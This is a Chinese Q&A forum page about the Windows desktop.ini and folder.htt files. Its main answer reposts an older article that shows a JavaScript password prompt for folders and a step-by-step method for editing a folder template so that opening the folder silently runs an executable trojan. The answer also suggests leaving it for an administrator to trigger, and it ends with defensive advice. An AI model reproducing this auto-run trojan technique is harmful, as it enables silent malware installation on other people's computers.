问答文章1 问答文章501 问答文章1001 问答文章1501 问答文章2001 问答文章2501 问答文章3001 问答文章3501 问答文章4001 问答文章4501 问答文章5001 问答文章5501 问答文章6001 问答文章6501 问答文章7001 问答文章7501 问答文章8001 问答文章8501 问答文章9001 问答文章9501

关于desktop.ini folder.htt

发布网友 发布时间:2023-01-15 20:52

我来回答

4个回答

热心网友 时间:2023-09-21 02:33

浅析Desktop.ini文件的一些奇妙用途

发布日期: 2004-12-30 20:59:28 作者: 文/阿雄 字体:【大 中 小】【打印本页】
娱乐/搞笑/体育视频免费看! 彩信/短信开发平台 免费测试您的IT潜质! 美萍洗浴、餐饮管理系统

您还记得当初大名鼎鼎的“欢乐时光”病毒吗?感染该病毒的硬盘中会有多个Desktop.ini和Folder.htt文件,就算你删除了目录中的这两个文件,当你再次打开该目录时,它们又像幽灵一样出现了。
再问大家一个与此相关的问题:在Windows系统中,重复文件最多的什么呢?答案是Desktop.ini文件!在Windows目录及其下的Favorites、System、Fonts、Tasks文件夹中都有该文件的身影!正是由于该文件的存在,使得它们在外观或其他方面也与普通的文件夹有所区别。下面笔者就谈谈这两个文件的一些奇妙用途。

一、给文件夹加上密码

在学校的机房和校园网络的管理中,是否经常会碰到这样的情况:一些计算机常因学生误删了Windows目录或SYSTEM目录下的一些系统文件而导致无法正常启动。是否有方法可以把Windows及其它重要目录保护起来呢?方法是有的,我们只需在这个Folder.htt文件中进行必要的修改,就可改变文件夹打开的方式。比如,要想在打开该文件夹前先进行安全认证,可这样修改这个Folder.htt。

在C盘的Windows文件夹中找到Folder.htt文件(该文件为隐藏文件,并且后来经过编辑与笔者共同验证,该文件不同的系统内容也不尽相同,本文种主要是Windows 98下的),打开Folder.htt文件。找到以下内容:

<a href=''class=command onclick='ShowFiles(); ShowWinStat(winStat); return false;' onMouseOver='ShowWinStat(!winStat); return true;' onMouseOut='ShowWinStat(winStat); return true;' onFocus='ShowWinStat(!winStat); return true;' onBlur='ShowWinStat(winStat); return true;'>显示文件</a>。";
将其修改为:
<a href=''class=command onclick='ShowFiles(); ShowWinStat(winStat); return false;' onMouseOver='ShowWinStat(!winStat); return true;' onMouseOut='ShowWinStat(winStat); return true;' onFocus='ShowWinStat(!winStat); return true;'

onBlur='ShowWinStat(winStat); return true;'>输入密码</a>。";

(2)找到function ShowFiles() {
Info.innerHTML = L_Intro_Text + "<br><br>" + L_Prompt_Text;
showFiles = true;
document.all.FileList.style.display = "";
document.all.Brand.style.display = "none";
FixSize();
}
修改为: ★function ShowFiles()

{var password=prompt("请输入密码:","");
if (password=="你的密码"){Info.innerHTML = L_Intro_Text + "<br><br>" + L_Prompt_Text;
showFiles = true;
document.all.FileList.style.display = "";
document.all.Brand.style.display = "none";
FixSize();}
else{alert("警告,密码错误!您无权浏览该目录");}}

(3)保存修改后的Folder.htt文件,退出Windows文件夹。

完成上述操作步骤后,再进入Windows目录时,系统提示输入密码,只有输入正确的密码才能进行该目录。通过修改打开行为的代码,就可实现对某个目录的简单加密。

当然,这种加密目录很容易解开:不使用Web方式打开文件夹,避开执行该程序,或直接从DOS中进入该文件夹都可绕开密码的输入。

如果你使用的是Windows 2000系统,可以找到

………………
<script language="JavaScript">

然后在后面加上以下代码:

var pass =prompt("enter the password")
if (pass!="密码")
{window.location="d:"}

就可以给文件夹加上访问口令!这样你的文件夹就多了一层保护。

二、任意文件夹和硬盘分区的保护

根据同样的原理,我们可对任意文件夹及硬盘分区设置保护口今。具体操作步骤如下:

(1)打开要加密的文件夹或硬盘分区,选择文件菜单中的“查看→自定义文件夹”。

(2)在打开的“自定义文件夹”窗口中,如图1所示选择“创建或编辑HTML文档”,单击“下一步”按钮,再单击“下一步”按钮,关闭记事本编辑窗口,单击“完成”按钮。在当C盘Windows目录下找到Folder.htt文件,把它复制到当前文件夹中,覆盖原来的Folder.htt文件。

(3)打开Folder.htt文件,找到★var L_Intro_Text= "<b><font color=red>警告</font></b><br><br>修改该文件夹的内容可能导致程序运行不正常。";★(警告内容),将其修改为“自定义的内容”。完成Folder.htt的文件修改后,再进入相应的文件夹或硬盘分区,则需要提供正确口令,否则无法显示该文件夹的内容。

图1

(一)、利用文件夹安装木马

黑客可以利用文件夹来安装木马,其目的是对方只要打开某个文件夹就自动安装木马文件。知己知彼方能百战不殆,让我们了解一下其原理和方法。

图2

[page]
1.先在以目录下建立一个文件夹test文件夹,进入刚建的文件夹test点击“工具”菜单选择“文件夹选项”项(图2);出来文件夹选项对话框如图所示(图3),把“隐藏受保护的操作系统文件(推荐)”前面打上“√”,接着出现一个警告窗口,如图所示(图4),直接点击“是”。再把“隐藏文件和文件夹”下选择“显示所有文件和文件夹”,最后点击确定在本目录下出现了Folder settings隐藏文件夹和Desttop.ini隐藏文件如图所示(图5)。

图3

图4

图5

2.现在点击“查看”菜单选择“自定义文件夹”项(图6),打开的“自定义文件夹”窗口,选择其中的“创建或编辑HTML文档”,单击“下一步”按钮,再单击“下一步”按钮,然后关闭记事本编辑窗口,单击“完成”按钮,就把文件夹设置成按WEB方式打开文件夹。再打开要放木马的文件夹,我们就在这个文件夹里测试。Folder.Htt是文件夹的模板文件,现在我们修改文件夹的模板文件,在里面插入一端自动运行程序的代码:

<script language="javascript">
run_exe="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""
run_exe+="CODEBASE="test.exe#version=1,1,1,1">"
run_exe+="<PARAM NAME="_Version" value="65536">"
run_exe+="</OBJECT>"
document.open();
document.clear();
document.writeln(run_exe);

document.close();
</script>

图6

就是这段里面的test.exe为你要安装的木马文件,这里为了给大家看到效果我运行的是LC4。

3.现在我们把要运行的test.exe文件也copy到这个文件夹里,好了,我们现在把文件查看属性修改回去,就是步骤1的逆过程。

4.OK,如果你不想要木马立即运行,请把窗口直接关闭,等管理员来运行吧。让我们来看看效果,退出test文件夹然后双击test文件夹图标,如图所示(图7),怎么样,运行了吧,大家可以把test.exe换成小点的木马,这样对方就在不知道的情况下给自己装了木马。其实大家如果要有什么文件要隐藏的话,就可以放到folder.htt和同目录下,把文件夹属性设置回去以后,用搜索都找不到这个文件。

图7

三、总结

好了,Folder.htt和Desktop.ini文件的好的应用和需要注意的都讲了,是不是觉得很有意思也很恐怖哦!现在我们说一下防范与解决办法:

1.查看文件夹时,去掉以“Web页方式”的选项。虽然我们看不见什么个性化目录了,但我们换来是安全,我认为值!但是,也请大家注意,如果不采用“WEB方式”查看文件夹前面介绍过的技巧和应用就不能正常显示了,有得就有失啊。

2.如果没有什么需要,去掉默认共享和共享目录。要是需要,公共用户也要加上密码,密码只有内部人知道。只要能上传文件,你的机器就很危险。除了上边的方法,还可以用MIME漏洞,ASP漏洞入侵,如果是Windows 98还有共享方法。所以一定要把好关!

3.脚本病毒的一大特征就是利用WSH。要是服务器最好去掉WSH,这样能低御许多脚本病毒。方法是:在“控制面板”里选择“添加/删除程序”,选择“Windows安装程序”里的附件,再选择“详细资料”中的“Windows Scripting Host”把它卸载掉。

参考资料:http://news.newhua.com/Html/System_win/2004-12/30/161353713.shtml

热心网友 时间:2023-09-21 02:34

这个确实是“欢乐时光”,但可能是最新的变种。
不管怎样,将杀毒软件升级到最新的病毒库都可以查杀。
你听到说法是有一种木马,在系统感染后,这个木马杀掉后会出现双击盘符无法打开的症状。因为木马会改变文件中的指向导致的,与为个无关。

热心网友 时间:2023-09-21 02:34

可以删除,如不放心可咨询当地高手现场观察,或将这个文件重命名,并删除之,记得以后做系统备份,及时恢复

热心网友 时间:2023-09-21 02:35

没问题
可以删除,如不放心,你可以用专杀在检查一下
不会无法启动
声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com
...了我亲弟弟的女朋友了 她也喜欢我 我该怎么办 他们已经分手了... ...个朋友的老婆你说我该追她吗 他们现在已经分手了 月经第三天有大量血块排出是什么原因 如何关闭360推荐的广告学习关闭360推荐广告 手机浏览器的不雅广告怎么清除 怎样设置浏览器推送内容 学政治对考公务员有优势吗 公务员必须选政治吗 如何提高苹果手机的下载速度 苹果手表有必要买蜂窝版吗苹果手表有必要买蜂窝版吗 狗狗补钙吃什么好htt 洪庆高风险地区 怎样给宝宝取个好的小名 奥特曼记念币有长方形的吗 是竖着的长方形的盒子奥特曼卡片叫烈什么 请各位大侠帮帮忙,我想知道有关于广州福天信息技术有限公司的详细资料 广州天河区哪里有做医用设备不错的 有谁用过福天信息技术公司的医用腕带?想听听大伙的意见。 新开公司,征优质的条码碳带生产商,长期合作的 梦见在家救活一只羊 燕麦色马甲配杏色打底衫好看吗 多宝阁的衬衣配什么颜色的针织马甲 黄色马甲配杏色衫好看吗 杏色内搭和白色外套中搭什么颜色马甲好? 杏色衬衣搭配什么色马甲 杏色搭配法则 海豚寓意 怎么注册? 一起讨论下5G Sa模式下待机耗电量 4500毫安电池开5g网待机一天耗电多少? 怎么申请 注册 长安cs55胎压故障灯怎么消除 知否哪里可以看全集? 高空作业证有本子的吗 盐_鸡爪的制作方法 参军父母都有什么待遇 儿子上军校父母享受什么待遇 吴邪怎么吃的麒麟竭 梦见被狗咬了没出血 rx570黑苹果跑码后黑屏 西冷牛排无水焗的做法? 华为Mate30怎么无线充电? 《追书神器》听书方法介绍 怎么邀请别人开通快接单功能 谁知道怎么制作游戏字幕啊~请各位大神指点~ 请教,做游戏视频添加字幕用什么软件 苹果手机王者荣耀为什么不能更新?也不能下载了? 你好,普宁建设银行今天初十了,有上班吗? 正月初一至初十工商银行放星期天吗 心中压抑的情绪如何排解 国产艾弗森是啥牌子 艾弗森鞋子什么档次 网贷不还会有什么后果。?